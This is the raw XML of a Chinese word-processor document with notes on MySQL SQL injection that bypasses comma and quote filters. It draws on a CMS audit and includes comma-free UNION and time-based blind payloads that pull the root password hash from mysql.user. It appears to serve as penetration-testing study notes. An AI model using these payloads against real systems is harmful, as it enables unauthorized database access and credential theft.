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不使用单引号和逗号进行</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style15"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Internet"/>
          </w:rPr>
          <w:t>http://www.lijiejie.com/mysql-injection-bypass-waf/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style15"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Internet"/>
          </w:rPr>
          <w:t>http://www.2cto.com/article/201501/373677.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>substr</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>函数绕过不能使用逗号的情况</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style15"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>不能使用逗号的情况较少，往往是因为逗号有某些特殊的作用，被单独处理了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style15"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>通常，猜解都是要用到逗号的，因为需要</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mid</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>函数取字符呐：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5"/>
        <w:spacing w:lineRule="atLeast" w:line="225" w:before="180" w:after="180"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ascii(mid(user(),1,1))=150</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="287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"/>
        <w:gridCol w:w="2663"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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663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ascii(mid(user(),1,1))=150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5"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>绕过的方法是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>from x for y</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。语法类似：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5"/>
        <w:spacing w:lineRule="atLeast" w:line="225" w:before="180" w:after="180"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">mid(user() from 1 for 1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>substr(user() from 1 for 1)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="265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"/>
        <w:gridCol w:w="2439"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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39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mid(user() from 1 for 1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>或</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>substr(user() from 1 for 1)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5"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>以上同样是从第一个字符开始，取一位字符。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style15"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>那么，不带逗号注入的语法，就可以变成：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5"/>
        <w:spacing w:lineRule="atLeast" w:line="225" w:before="180" w:after="180"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mysql&gt; select ascii(substr(user() from 1 for 1)) &lt; 150; +------------------------------------------+ | ascii(substr(user() from 1 for 1)) &lt; 150 | +------------------------------------------+ | 1 | +------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="549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1"/>
        <w:gridCol w:w="5280"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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3</w:t>
            </w:r>
          </w:p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4</w:t>
            </w:r>
          </w:p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5</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:spacing w:lineRule="atLeast" w:line="22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28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mysql&gt; select ascii(substr(user() from 1 for 1)) &lt; 150;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>+------------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>| ascii(substr(user() from 1 for 1)) &lt; 150 |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>+------------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>|                                        1 |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>+------------------------------------------+</w:t>
            </w:r>
          </w:p>
          <w:p/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5"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>是不是跟</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mid</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>函数的效果是一样的，又没有用到逗号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style15"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style22"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="fontzoom"/>
      <w:bookmarkStart w:id="1" w:name="Article"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0X00 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>背景</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style22"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>审计</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cms</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>发现一个这样的环境：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2"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Internet"/>
          </w:rPr>
          <w:t>?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="3976" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="56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3836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</w:t>
            </w:r>
          </w:p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3836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>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>$l_id = get('arr','l_id');</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>$ids = explode(',',$l_id);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2"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>拼接</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中数组的请求，然后再用逗号分隔，最后带入了</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>查询。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style22"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>于是就遇到了不能使用逗号的情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style22"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>默认</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style22"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>display_error=off</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style22"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>无显错，只能盲注。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style22"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0X00 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>解决方案：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style22"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>主要解决</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>substring</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的逗号问题。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22"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Internet"/>
          </w:rPr>
          <w:t>?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9071" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="567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0"/>
        <w:gridCol w:w="8931"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="140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/>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8931" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>select * from table1 where id =1</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>and exists (select * from table2 where ord(substring(username from 1</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>for</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>1)=97);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>127' UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)#</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>select case</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>when substring((select password from mysql.user where user='root') from 1</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>for</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>1)='e'</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>then sleep(5) else</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>end #</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Style20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>substring((select password from mysql.user where user='root') from -1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Style13"/>
              </w:rPr>
              <w:t>='e'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22"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>以上例句请根据自己的情况而定。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style15"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style15"/>
        <w:spacing w:before="0" w:after="14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paragraph" w:styleId="Style22">
    <w:name w:val="列表内容"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="567" w:hanging="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Style23">
    <w:name w:val="列表标题"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Style22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jiejie.com/mysql-injection-bypass-waf/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/article/201501/373677.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/article/201501/373677.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/article/201501/373677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450</Words>
  <Characters>1427</Characters>
  <CharactersWithSpaces>1599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2017-07-20T17:48:53Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>zh-CN</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-20T17:54:22Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>